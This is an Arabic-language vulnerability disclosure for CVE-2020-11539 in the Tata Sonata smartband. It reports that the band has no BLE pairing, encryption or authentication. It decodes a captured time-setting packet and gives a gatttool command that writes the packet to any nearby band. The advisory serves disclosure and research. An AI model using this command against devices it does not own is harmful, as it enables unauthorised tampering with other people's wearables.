
التحكم غير السليم في الوصول في Tata Sonata Smartband
الوصف: لقد تم تحديد أن السوار الذكي لا يحتوي على إقران (مستوى أمان BLE بالوضع 0) والبيانات المنقولة عبر الهواء غير مشفرة. إضافة إلى ذلك، البيانات المرسلة إلى السوار الذكي لا تخضع لأي مصادقة أو تحقق من التوقيع، مما يتيح لأي مهاجم التحكم في معاملات الجهاز الذكي.
الإصدارات المتأثرة: Smart SF Rush - 1.12
الباحث: Sayli Ambure (https://twitter.com/sayli_ambure)
رابط MITRE CVE: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11539
الحزمة التالية تم تحليلها بالهندسة العكسية وتبيّن أنها لتغيير الوقت، ويمكن تحليل المزيد من الحزم عبر استخراج تفريغ hcisnoop من هاتفك.
قيمة البيانات: 00870e00141401060712052b051e
| البيانات (Hexdump): | 00 | 87 | 0e | 00 | 14 | 14 | 01 | 06 | 07 | 12 | 05 | 2b | 05 | 1e |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| البيانات العشرية: | 00 | 135 | 14 | 00 | 20 | 20 | 01 | 06 | 07 | 18 | 05 | 43 | 05 | 30 |
00 87: رأس الحزمة
0e 00: نوع الحزمة
14 14: السنة بالنظام الست عشري (2020)
01 06: الشهر واليوم (6 يناير)
07 12: الساعة والدقيقة بالنظام الست عشري (07:18 صباحًا)
05 : الثواني
gatttool -t random -b <mac-address> --char-write-req -a 0xe -n 00870e00141401060712052b051e